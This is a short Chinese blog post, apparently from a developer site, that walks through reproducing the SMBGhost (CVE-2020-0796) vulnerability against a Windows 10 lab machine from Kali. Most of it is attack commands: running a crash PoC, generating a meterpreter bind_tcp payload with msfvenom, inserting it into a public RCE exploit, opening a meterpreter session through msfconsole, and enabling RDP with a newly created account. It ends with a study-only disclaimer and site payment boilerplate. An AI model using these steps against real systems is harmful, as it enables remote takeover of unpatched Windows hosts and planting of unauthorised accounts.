永恒之黑漏洞复现

第一步  查看一下靶机ip

再查看一下kali ip地址

靶机与kali 互相ping一下 查看是否连通

在靶机中 查看一下漏洞是否存在

漏洞存在

在kali中输入: python3 CVE-2020-0796.py  靶机ip

靶机会出现蓝屏

此时蓝屏攻击完成

输入命令: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python生成反向木马

将上面部分替换到 SMBGhost_RCE_Poc-master中exploit文件中的

然后打开msf

连续输入命令

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 8888

set rhost 192.168.191.168(此处IP地址为win10虚拟机地址)

run

此时重新打开一个终端 输入: python3 exploit.py -ip 靶机ip

此时查看win10没有蓝屏  kali中出现meterpreter证明攻击成功

可以输入命令:命令:run post/windows/manage/enable_rdp USERNAME=abc PASSWORD=123456

注册新用户

输入靶机ip  输入设置的密码账号

完成远程登陆

注:本文章仅供本人学习使用吗,禁止用于非法用途。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值